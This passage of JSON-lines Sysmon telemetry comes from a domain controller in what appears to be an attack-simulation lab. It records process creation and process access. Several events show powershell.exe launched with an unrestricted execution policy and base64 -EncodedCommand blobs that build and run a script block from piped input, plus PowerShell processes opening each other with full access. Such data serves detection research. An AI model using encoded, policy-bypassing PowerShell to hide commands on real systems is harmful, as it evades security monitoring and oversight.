AQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.345","ProcessGuid":"{41C8662E-20CD-5F25-0000-00108FB10700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CD-5F25-0000-002017A10700}","LogonId":"0x7a117","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-20CD-5F25-0000-0010FEA40700}","ParentProcessId":"4544","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4869,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.330\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-0010FEA40700}\r\nSourceProcessId: 4544\r\nSourceThreadId: 3456\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e82ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66dd5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+662e4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66342ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6632634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6632634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663261dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66318161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66324694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66324287(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66dd5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6630aae2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6630a0b2(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.330","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-0010FEA40700}","SourceProcessId":"4544","SourceThreadId":"3456","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-00108FB10700}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e82ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66dd5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+662e4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66342ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6632634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6632634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663261dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66318161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66324694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66324287(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66dd5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6630aae2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6630a0b2(wow64)","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4870,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.330\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.330","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-00108FB10700}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4871,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.330\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.330","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4872,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|